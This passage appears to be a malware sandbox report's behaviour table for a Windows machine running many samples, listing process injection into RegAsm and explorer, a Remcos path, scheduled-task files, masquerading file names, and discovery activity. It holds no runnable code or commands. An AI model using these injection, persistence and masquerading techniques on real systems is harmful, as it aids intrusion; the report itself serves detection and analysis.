File opened for modification C:\Windows\SysWOW64\directx\websetup\SET71C2.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\SysWOW64\directx\websetup\SET71C2.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2536 set thread context of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 set thread context of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4264 set thread context of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1092 set thread context of 3616 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3796 set thread context of 3012 N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Windows\explorer.exe
PID 2800 set thread context of 3984 N/A C:\Users\Admin\Desktop\Files\87f3f2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5012 set thread context of 5592 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
PID 1868 set thread context of 5600 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
PID 6728 set thread context of 5764 N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Windows\explorer.exe
PID 1528 set thread context of 6020 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
PID 3728 set thread context of 4496 N/A C:\Users\Admin\Desktop\Files\Mswgoudnv.exe C:\Users\Admin\Desktop\Files\Mswgoudnv.exe
PID 408 set thread context of 6364 N/A C:\ProgramData\Remcos\remcos.exe \??\c:\program files (x86)\internet explorer\iexplore.exe
PID 7300 set thread context of 7028 N/A C:\Users\Admin\Desktop\Files\setup.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 6100 set thread context of 6716 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe
PID 5060 set thread context of 7684 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
PID 5332 set thread context of 6436 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
PID 6332 set thread context of 5204 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
PID 2056 set thread context of 8600 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Windows\system32\schtasks.exe
PID 680 set thread context of 7844 N/A C:\ProgramData\gnabpgw\wohcj.exe C:\ProgramData\gnabpgw\wohcj.exe
PID 6520 set thread context of 6588 N/A C:\Users\Admin\Desktop\Files\yiklfON.exe C:\Users\Admin\Desktop\Files\yiklfON.exe
PID 8248 set thread context of 6412 N/A C:\ProgramData\gnabpgw\wohcj.exe C:\ProgramData\gnabpgw\wohcj.exe
PID 6872 set thread context of 7336 N/A C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe C:\Windows\explorer.exe
PID 12672 set thread context of 5784 N/A C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe C:\Windows\explorer.exe
PID 11400 set thread context of 10152 N/A C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe

UPX packed file

upx

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\f21.bmp C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\original.exe N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-DCU30.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-AHIH9.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\original.exe N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-N5V1T.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-PRVGE.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
File created C:\Program Files (x86)\金锐行情交易系统\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-2FP8S.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\back3.bmp C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\d1.bmp C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\ac2.bmp C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
File created C:\Program Files (x86)\金锐行情交易系统\Languages\is-HIV3C.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\金锐行情交易系统\Languages\is-T4OHF.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\x2.bmp C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\t1.bmp C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe N/A
File created C:\Program Files (x86)\Kuwait Ice Hockey DB\is-8KV2G.tmp C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-GT5TL.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\w2.bmp C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-2S9QH.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\back.png C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe N/A
File opened for modification C:\Program Files (x86)\AnyDesk\AnyDesk.exe C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-FBO4V.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-QFNHP.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification \??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\wow.htm C:\Users\Admin\Desktop\Files\wow.exe N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-FGGQA.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-IBUCV.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\x1.bmp C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe N/A
File opened for modification C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
File created C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-C95O9.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-SVBK7.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\w1.bmp C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
File opened for modification \??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\wow.gif C:\Users\Admin\Desktop\Files\wow.exe N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\ac1.bmp C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-F36PK.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-8ANHN.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-VFT99.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\is-35B8I.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-6ORKR.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\金锐行情交易系统\is-BKHF2.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\金锐行情交易系统\Languages\is-AQET7.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\金锐行情交易系统\ac3.bmp C:\Program Files (x86)\金锐行情交易系统\FuturesClient.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
File created C:\Windows\fonts\pssystem-regular.ttf C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Windows\msdownld.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\msdownld.tmp\AS5B91B3.tmp\dxupdate.cab C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\msdownld.tmp\AS5B91B3.tmp\dxupdate.cab C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\Desktop\Files\Mswgoudnv.exe N/A
File created C:\Windows\msdownld.tmp\AS5BC72B.tmp\dxupdate.cab C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\msdownld.tmp\AS5BC72B.tmp\dxupdate.cab C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\msdownld.tmp\AS5BC72B.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\sysnldcvmr.exe C:\Users\Admin\Desktop\Files\twztl.exe N/A
File opened for modification C:\Windows\fonts\pssystem-regular.ttf C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Windows\Logs\DirectX.log C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
File opened for modification C:\Windows\msdownld.tmp\AS5B91B3.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\sysnldcvmr.exe C:\Users\Admin\Desktop\Files\twztl.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\Files\random.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\Files\frap.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\Files\kp8dnpa9.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\pornhub_downloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\W4KLQf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\PORNHU~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\surfex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Remcos\remcos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\surfex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\Mswgoudnv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\3dismhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\onetap.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\gnabpgw\wohcj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\gnabpgw\wohcj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\gnabpgw\wohcj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\dismhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\surfex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\2dismhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\twztl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\gnabpgw\wohcj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
